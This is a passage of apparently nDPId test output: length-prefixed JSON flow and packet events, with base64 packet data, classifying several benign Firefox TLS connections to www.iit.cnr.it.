{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"}
00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"}
00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"}
00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"}
00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
